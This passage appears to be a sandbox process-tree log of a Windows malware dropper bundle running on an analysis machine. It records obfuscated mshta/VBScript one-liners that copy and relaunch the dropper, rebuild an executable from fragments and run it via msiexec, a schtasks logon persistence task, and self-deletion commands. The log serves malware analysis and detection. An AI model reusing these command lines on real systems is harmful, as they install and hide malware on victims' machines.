                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 888
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 900
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 1012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6272
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\8.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\WerFault.exe -u -p 6020 -s 1528
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6424
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7144
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6852
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:11096
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    taskkill -f -iM "search_hyperfs_206.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7568
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1680
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3140
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7448
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Thu12ca1c119bc29.exe /mixone
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1956
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12ca1c119bc29.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Thu12ca1c119bc29.exe /mixone
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "Thu12ca1c119bc29.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12ca1c119bc29.exe" & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5204
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  taskkill /im "Thu12ca1c119bc29.exe" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Thu12493eba7a.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Thu12912263469836d.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Thu1262fd911d3e6320.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3648
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Thu122f7469b214cb59.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Thu126011caea28.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2724
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu126011caea28.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Thu126011caea28.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2784
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu126011caea28.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu126011caea28.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5140
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12493eba7a.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Thu12493eba7a.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5108
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ( "cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12493eba7a.exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If """" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12493eba7a.exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5128
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12493eba7a.exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "" == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12493eba7a.exe" ) do taskkill -f -Im "%~nXQ"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5308
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                yDhNY.exe /pFKkSWJQc5v2ppVFMo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ( "cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If ""/pFKkSWJQc5v2ppVFMo "" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "/pFKkSWJQc5v2ppVFMo " == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" ) do taskkill -f -Im "%~nXQ"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VBSCRiPT: cLoSe (CREATeOBJEcT ( "WScRIPt.SHEll" ). rUN ( "C:\Windows\system32\cmd.exe /Q /R eCHo | set /P = ""MZ"" > 1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7 " , 0 ,trUE ) )
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /Q /R eCHo | set /P = "MZ" >1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6436
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>1FRnX.N"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    msiexec.exe -Y .\ISA502G.S7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5556
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                taskkill -f -Im "Thu12493eba7a.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12465fe68f85b6156.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Thu12465fe68f85b6156.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu1262fd911d3e6320.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Thu1262fd911d3e6320.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4332
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu122f7469b214cb59.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Thu122f7469b214cb59.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\4402660.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\4402660.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5912648.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5912648.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6136
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\1030691.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\1030691.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\6168135.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\6168135.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\3942899.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\3942899.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
